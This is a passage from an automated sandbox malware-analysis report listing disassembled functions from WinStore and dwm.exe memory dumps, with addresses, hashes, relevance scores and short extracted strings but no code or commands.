Instruction ID: d550134b727e464bdf84e2bca5d86b1d7f134db8dd7d3a8633c60dae23d429f4
Opcode Fuzzy Hash: 1341a56488223307d42014d1cf0191edc2dfb40f8cf117238c43e6bb9be09ab0
Instruction Fuzzy Hash: 7D415870D6A64D8FEB55EB98C4546FDBBB2FF49340F94007AD00AE7292CA386944CB40

Function 00007FF887B28973 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b28000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8364a87df742e858561b89cce8a1fbabd9c35bb2bf0f2bde997cb996994b1
Instruction ID: b35a7af4a907810a06abe9f055154d81b9f0b3e94d9c5e3adedc778b12d922ef
Opcode Fuzzy Hash: d8f8364a87df742e858561b89cce8a1fbabd9c35bb2bf0f2bde997cb996994b1
Instruction Fuzzy Hash: A631EC70E6991D8FEB94EB98D8956FDB7B2FF99340F901139D00DE3286DE24A841DB40

Function 00007FF887B289E2 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b28000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2835b7a6f6e3c79ffe6a51a572e01e0dc212b992ac514f8bc5f37b1a6e1713d
Instruction ID: d211bdc5449042fe9bad63c395042107b19d8f3dca3d702eec2e9d66298eb466
Opcode Fuzzy Hash: c2835b7a6f6e3c79ffe6a51a572e01e0dc212b992ac514f8bc5f37b1a6e1713d
Instruction Fuzzy Hash: FB21ED70E6991D8FEB94EBA8D4956FDB7B2FF59340F90113AD00DE7286DE24A841CB40

Function 00007FF887B2162F Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f688df7bad5891c377738417f059b8ce35cc044b8a03ab517b1b7e754b02b4b
Instruction ID: 3d64b0a73f415f546ec7db0e273e7dd2f200d1a2aaf125e5d551afc902d71447
Opcode Fuzzy Hash: 8f688df7bad5891c377738417f059b8ce35cc044b8a03ab517b1b7e754b02b4b
Instruction Fuzzy Hash: 2321F770D6950D8FEB84EB98C4946FDBBF2FF58341F54416AD00AE72A1CA386980CB04

Function 00007FF887B20E40 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbf6c47e277de13c8a1d617728d460e9582f0f4ba29d469882b929fab48a7bf1
Instruction ID: dc8443aec9ac305b7366b0fd7c44afdd9d7215c12c5a7b7a31d91576d00c8f4a
Opcode Fuzzy Hash: dbf6c47e277de13c8a1d617728d460e9582f0f4ba29d469882b929fab48a7bf1
Instruction Fuzzy Hash: CA219074D5E28E8FE701AB60C8042FE7BB2FF1A345F140676C425D6192DB3C5549CB91

Function 00007FF887B2FEA1 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26806a36521312a5128ef29b8fab9e74e533f57f2cc24bbc7ab9fc6b9a6882a1
Instruction ID: 103ad0cbe47a905e664432974f7369b922eaf7536c82753bfbb24935ab10ac45
Opcode Fuzzy Hash: 26806a36521312a5128ef29b8fab9e74e533f57f2cc24bbc7ab9fc6b9a6882a1
Instruction Fuzzy Hash: 3F01923195D69E8FDB51EF64A8002FE77B5FF4A350F50017AE019E3282DB245918C791

Function 00007FF887B2FE0C Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448dcb2d0ad357280fd1ba601a9765baf450e50c6742aa7464a1b4267b4afb54
Instruction ID: 332e38233a1f1de5a8128f85ead79861e2051d05462a449c575615378ab0bea2
Opcode Fuzzy Hash: 448dcb2d0ad357280fd1ba601a9765baf450e50c6742aa7464a1b4267b4afb54
Instruction Fuzzy Hash: 30113631D5A12A8FDF48EBA4E4942FEB2B1BF08351F50003ED01AB22C2CA385A40CB65

Function 00007FF887B20DC9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ecf4f3b70bfd08c6f518509965956988c405dbf15fd301e0dc7e050bd431afa
Instruction ID: 98ab3085c5185edb36cda55912cc664473813115fcfd9d75eb3c4c4c8384a4a8
Opcode Fuzzy Hash: 3ecf4f3b70bfd08c6f518509965956988c405dbf15fd301e0dc7e050bd431afa
Instruction Fuzzy Hash: 74115B70D5E24E8FEB11AB60C8042BE77B2FF19340F444576C025A62E2DB3C5684CB81

Function 00007FF887B216F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31be93fc2dbcac8662e4847d5eca65988f1850118426fb863da5b896b1e39b5
Instruction ID: 53feb0e8a9d17f4ae3c75883e46c3c5403a63bc748c171017f4b19ae76ef745e
Opcode Fuzzy Hash: e31be93fc2dbcac8662e4847d5eca65988f1850118426fb863da5b896b1e39b5
Instruction Fuzzy Hash: EB115B3088E3C95FD743ABB088685D97FB4EF47214F1905EBD489CB0A3D66D594AC722

Function 00007FF887B214A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f25ab74bb835c5d8cd65715a3438ff47478acbab56364f3c9a12ac4edcecda4
Instruction ID: d66d4d03cf0f50540055d2eeebc7be83ae5bb0cbd07251d130ef33c6176ded79
Opcode Fuzzy Hash: 5f25ab74bb835c5d8cd65715a3438ff47478acbab56364f3c9a12ac4edcecda4
Instruction Fuzzy Hash: D7017C3148E3C98FC3139BB488612A47FB5BF07240F4A44EBC495CB4E3D62C6869CB22

Function 00007FF887B2FC5D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4304221f810e17791243bc7bc9e57dcfbeba36221350251b5841dfe829f4be99
Instruction ID: c12857607bd625858c209bf3a7c27c29229bb9e964707819eefc499f2cf4ba84
Opcode Fuzzy Hash: 4304221f810e17791243bc7bc9e57dcfbeba36221350251b5841dfe829f4be99
Instruction Fuzzy Hash: 1C01D13088E2899FD7029BA0CC48AE97FF0FF0A310F0945EAE488C7162D63C9189C751

Function 00007FF887B2E845 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 398defb9727f7bb1867d33ead007d4d1d6121848cdd84aea124a8e36839eb025
Instruction ID: 3907c59624b116491e6a3cd39d4db1d3613af09a1560cc54af4a6268b33d599e
Opcode Fuzzy Hash: 398defb9727f7bb1867d33ead007d4d1d6121848cdd84aea124a8e36839eb025
Instruction Fuzzy Hash: E201AD71CAE6CD9FEB18EBA4944D2FC7BB2FF59340F8105BAD44CCA1A2DE286545C241

Function 00007FF887B29241 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b28000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93fd5a23c77d70137f5c60b775c66ddc7816181b62af2553ebb2802d35abd89c
Instruction ID: 16d69094b30f1055c1cdf1a5bf6fd569822d9f050e3f3bafbb72209ced0625d3
Opcode Fuzzy Hash: 93fd5a23c77d70137f5c60b775c66ddc7816181b62af2553ebb2802d35abd89c
Instruction Fuzzy Hash: B4014B3086D68D8FDB90EF6888492ED7BF1FF29300F8505A6D41CD6192EA749554C700

Function 00007FF887B2E7D5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f9f24b2a668aae16f68406a995f07127747feb26f8a94d5e281a789f417c9e
Instruction ID: b77d28ba764e9c00f17799a96be29c176189da78daae3827f19e3d3fbbe721fa
Opcode Fuzzy Hash: e0f9f24b2a668aae16f68406a995f07127747feb26f8a94d5e281a789f417c9e
Instruction Fuzzy Hash: 22F0A970C5D6C88FEB54EB64881C2ED7BA1FF1A240F4401BAE40CC61A2DA28A494CB42

Function 00007FF887B20A79 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3780ab01649c02c99be279ff0248da53133b4048240b22e4383ae7242ab1ae7d
Instruction ID: a7ed3af38e237f13fab9af6bd0b7b0f1c797c894d2cbcf08ef6df30679cc2158
Opcode Fuzzy Hash: 3780ab01649c02c99be279ff0248da53133b4048240b22e4383ae7242ab1ae7d
Instruction Fuzzy Hash: 01018F3189E7C98FE796AB6488652FD7FF1EF56240FC900BAD499C60D2DA285848C711

Function 00007FF887B2E705 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa747979b69d1370a23c38dbe8d3b7a2c4fc5f896885e90a94d1b68c94a9f9b
Instruction ID: b64eb9e85f82c09c97878cb1117a2270574d808a4105685d502988d4fddc99cb
Opcode Fuzzy Hash: 4aa747979b69d1370a23c38dbe8d3b7a2c4fc5f896885e90a94d1b68c94a9f9b
Instruction Fuzzy Hash: C9F0AF31C6D6898FEB94AF6488192ED7BA1FF11340F4804BAE41CC20B2DA289454CB42

Function 00007FF887B28DA1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B28000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b28000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cfa6da262f15852cdd1debf35f3ce8a8917f11355bae1ff311a290d35cd2c23
Instruction ID: 6fedc54fdf6226244c9d8b7c468b6fcea7a3b0cd2fb5fa98e55dbcd25670fd31
Opcode Fuzzy Hash: 1cfa6da262f15852cdd1debf35f3ce8a8917f11355bae1ff311a290d35cd2c23
Instruction Fuzzy Hash: 5FF090318AA68D8FDB41EF6488882ED7FF1FF14340F4405AAE408C20A2DA789554C701

Function 00007FF887B20A90 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1162f7136bf0bd86a36a4a3149a21bd7f5740b94f5689d95426fbae002d1fc01
Instruction ID: ae6ef1aa755a2d8f859afe7a85a52f30b5ad13383d5aefda67dfeeb71abf41b0
Opcode Fuzzy Hash: 1162f7136bf0bd86a36a4a3149a21bd7f5740b94f5689d95426fbae002d1fc01
Instruction Fuzzy Hash: FCF0B430CAE68D9AE794AB6484542FD7BF1FF1A344FC4007AD49EC20D1DA285594C710

Function 00007FF887B219A5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb7bc31762046e7f6ecd1c1dba3a5f94bed229f3d8fe084d4d7ebf9d4e35870
Instruction ID: 5e73e8210bcfb513cfbfc4d79edba5718055c0db67be868b990cef14d42c2d83
Opcode Fuzzy Hash: 4fb7bc31762046e7f6ecd1c1dba3a5f94bed229f3d8fe084d4d7ebf9d4e35870
Instruction Fuzzy Hash: 4EF090309A964D8FDB44EF68C8892ED7BF1FF48340F5400BAD808C3181DB799162CB40

Function 00007FF887B2E63D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2d000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19284f643c32ca4d7bff9bf1da5aac8c089aaad84eaec6726631e7526baf7c4b
Instruction ID: 52c75a22f4326d1e155c3fe936507c8f5681d16e0072ca05330639e5b5036744
Opcode Fuzzy Hash: 19284f643c32ca4d7bff9bf1da5aac8c089aaad84eaec6726631e7526baf7c4b
Instruction Fuzzy Hash: C7F0B431C9E6C9CFEB56AA6489196EC7BA1FF06350F4804B6D00CC60D3DE2C5514C742

Function 00007FF887B20C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 64badee2a02d79d419471c1e71054d25837e03794c843ce1339a3844d66002bb
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: 73E0ED70DEF4078AE710AA1488845BE7276FF51391F905A31D43A82196DF3C6145CB80

Function 00007FF887B20C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: fd5bc6750f8f8dd8b1d592480c016490584d41629c06fa1156df5ad5717f611d
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 6CE04F70D9B4078AE710AB44C8446BE7372FF50351F404631D43582295DF3C6145CB80

Function 00007FF887B2114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: 2e1b3e135711e3c91a07c967f77b5a76b6b5880572313ca7a428f83d28648d19
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 4BE0EC30A6551ECFDB14EF40C8949BE73B2FF94390F400A39D426D7291DBB86504CB80

Function 00007FF887B20BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: 8295b241af539997e04306660f8429b5210d45bd9ba61b51369ff4125024c8b7
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: 3FE01270D5A406CBE710DB44C8446BE7372FB50351F408226C42687295DB3CA545CF80

Function 00007FF887B2141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16090f5ebc1c928a33388aa4ed8d2f2e534cd6ca9251174c9960cb722e3b55c8
Instruction ID: a9eb5291ddc1d710c226edb0252a1cb2f25dfd8d712fb91b6ba338da9f7e59dd
Opcode Fuzzy Hash: 16090f5ebc1c928a33388aa4ed8d2f2e534cd6ca9251174c9960cb722e3b55c8
Instruction Fuzzy Hash: F9D0927096962D9EEB90EB58C448BADB6F0BF09345F5041A9D01CD2181DB7815C48B42

Non-executed Functions

Function 00007FF887B21980 Relevance: 7.8, Strings: 6, Instructions: 253COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B21AE6
r6y, xrefs: 00007FF887B21B09
r6y, xrefs: 00007FF887B21B2C
"9y, xrefs: 00007FF887B21A92
r6y, xrefs: 00007FF887B21B4F
b4y, xrefs: 00007FF887B21BAB

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: 2795a9b0cf04ce417c46d35f6faccc553f9dd78ef339a65c5b1352638171d37f
Instruction ID: 1457502a13944030d0cce5fee7d931fc192848826e8f9df8cdfa5bcf9f4bc8b4
Opcode Fuzzy Hash: 2795a9b0cf04ce417c46d35f6faccc553f9dd78ef339a65c5b1352638171d37f
Instruction Fuzzy Hash: E791BD31D58A8D8FEB89DB68D8957ADBBF1FF9A350F90017AC00DC7392DA682805C741

Function 00007FF887B219FD Relevance: 7.7, Strings: 6, Instructions: 239COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B21AE6
r6y, xrefs: 00007FF887B21B09
r6y, xrefs: 00007FF887B21B2C
"9y, xrefs: 00007FF887B21A92
r6y, xrefs: 00007FF887B21B4F
b4y, xrefs: 00007FF887B21BAB

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b20000_WinStore.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: d274934e9bb6aa194593d5b07e5950304e878d7a5f8c31dc796839c7fa45eb33
Instruction ID: 1dd4edcc3f9bb913d325d2bebde10cd6223975548a752582ca661cc58b7dc939
Opcode Fuzzy Hash: d274934e9bb6aa194593d5b07e5950304e878d7a5f8c31dc796839c7fa45eb33
Instruction Fuzzy Hash: 0981AB31D58A8D8FEB98DB68C8557ADBBF1FF9A350FA0017AC00DD7392DA682805C741

Function 00007FF887B2B64D Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

`, xrefs: 00007FF887B2B6B5
Y, xrefs: 00007FF887B2B6F0
u, xrefs: 00007FF887B2B4AE
X, xrefs: 00007FF887B2B577
H, xrefs: 00007FF887B2B4BB

Memory Dump Source

Source File: 00000013.00000002.1548113659.00007FF887B2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B2B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff887b2b000_WinStore.jbxd

Similarity

API ID:
String ID: H$X$Y$`$u
API String ID: 0-4051370763
Opcode ID: bbc28caf41ef3c9da346de3eeb652489c342a21325323197b74bad4dddeac661
Instruction ID: 525f0992405218b40d6fd599519d2c5b8fe3d3f538635dd2438f1946cac3b96c
Opcode Fuzzy Hash: bbc28caf41ef3c9da346de3eeb652489c342a21325323197b74bad4dddeac661
Instruction Fuzzy Hash: DE41A470D1A6698FEBA4DF14C898BADB6B2BF18345F5041EAD40DB7291CB385E84CF05

Analysis Process: dwm.exePID: 336, Parent PID: 3504COMMON

Executed Functions

Function 00007FF887B294C2 Relevance: 4.1, Strings: 3, Instructions: 329COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B29822
r6y, xrefs: 00007FF887B29523
r6y, xrefs: 00007FF887B29573

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: r6y$r6y$r6y
API String ID: 0-2630065439
Opcode ID: 3a0f567a5a5f636273b96c222ad984ad40a5f50cfad2eb822d960d5d366e2920
Instruction ID: 21596744e8256cb796a9ff5ad2eeb8f2bea64f16bfeb99804e614552088d658f
Opcode Fuzzy Hash: 3a0f567a5a5f636273b96c222ad984ad40a5f50cfad2eb822d960d5d366e2920
Instruction Fuzzy Hash: 97C1D530A6DA469FE749DF28C0946B8B7F2FF69340F944179C04EC7A86DB28B851C781

Function 00007FF887B29FA0 Relevance: 4.0, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

b4y, xrefs: 00007FF887B2A0A2
r6y, xrefs: 00007FF887B2A183
r6y, xrefs: 00007FF887B2A102

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: b4y$r6y$r6y
API String ID: 0-145830091
Opcode ID: 29c6b8704da9206bba5944c525ef202a88b7c48990a01c7566ce1c7c96e24f3b
Instruction ID: ff5dd18a929b4ea48e5f9737197c16aa68eb36b7d69b2cbad9efc610f937b19c
Opcode Fuzzy Hash: 29c6b8704da9206bba5944c525ef202a88b7c48990a01c7566ce1c7c96e24f3b
Instruction Fuzzy Hash: 0C71C030D196498FEB99DB6888597BDBBB1FF1A340F4445BED40DD3292DE386984CB02

Function 00007FF887B29998 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B299C7
, xrefs: 00007FF887B29A12

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: $r6y
API String ID: 0-2905162897
Opcode ID: 26edd4934851fca0f30305faf90c0dfadda81857bb0b83ea59fb372ed76b98f3
Instruction ID: bcfc482d9b1e13bccfdc1ff41dd2a85aa1beacc8b68be3833e35c59d679835cd
Opcode Fuzzy Hash: 26edd4934851fca0f30305faf90c0dfadda81857bb0b83ea59fb372ed76b98f3
Instruction Fuzzy Hash: 6F518A30D5964E9FDB59CBA8C8546FDBBB2FF59340F6040BAC01EE7282CA382901CB41

Function 00007FF887B288FA Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

M_^5, xrefs: 00007FF887B288FA
M_^A, xrefs: 00007FF887B2892A

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: M_^5$M_^A
API String ID: 0-2108912661
Opcode ID: 9438f5d0a2b0afab2878dfb258b510aff33eb51720c4afb4216f7c276243e252
Instruction ID: 2e3771d81305e6c21fe86b8de80fea3e1580a5fe14040246009a5ea1abd39019
Opcode Fuzzy Hash: 9438f5d0a2b0afab2878dfb258b510aff33eb51720c4afb4216f7c276243e252
Instruction Fuzzy Hash: FB317C72E1EA4A9FD745AB2898857E8B3E1FF25360B4446BBC01DC7583DE14A80AC341

Function 00007FF887B1B964 Relevance: 2.6, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

6y, xrefs: 00007FF887B1B9F1
B, xrefs: 00007FF887B1BAAB

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1b000_dwm.jbxd

Similarity

API ID:
String ID: 6y$B
API String ID: 0-1482009947
Opcode ID: af7c635fc15f88f71ea91b04dd6734dbec7d26773f24c3d8ff5c327703af03df
Instruction ID: 5134d1107543cf6ca094ca418e908538316678614b4d0498615d0f59870af416
Opcode Fuzzy Hash: af7c635fc15f88f71ea91b04dd6734dbec7d26773f24c3d8ff5c327703af03df
Instruction Fuzzy Hash: 4541C570D18E598FDBA8DB18DC997AAB7B2FB54342F5001E9D40DE3291DE346A818F41

Function 00007FF887B22E5B Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF887B22EE5
P}, xrefs: 00007FF887B22EDA

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: H$P}
API String ID: 0-4288226858
Opcode ID: 4250afb2cd8e1e7a3ab4e61a34f0b6c2b5aa39e9f0cf63d3f635dc98c9b2d0dc
Instruction ID: 2a1c6c97385d59ccb1958e8a60d225526a1e8cd860c804ac2275bb6d2b48de9b
Opcode Fuzzy Hash: 4250afb2cd8e1e7a3ab4e61a34f0b6c2b5aa39e9f0cf63d3f635dc98c9b2d0dc
Instruction Fuzzy Hash: B931A370959A5D8EEBA5EB588859BE8B7B2FB59341F5001E9D40DE2291CB389E81CF00

Function 00007FF887B2D1A0 Relevance: 1.8, Strings: 1, Instructions: 520COMMON

Download Yara Rule

Strings

p[{, xrefs: 00007FF887B2E186

Memory Dump Source

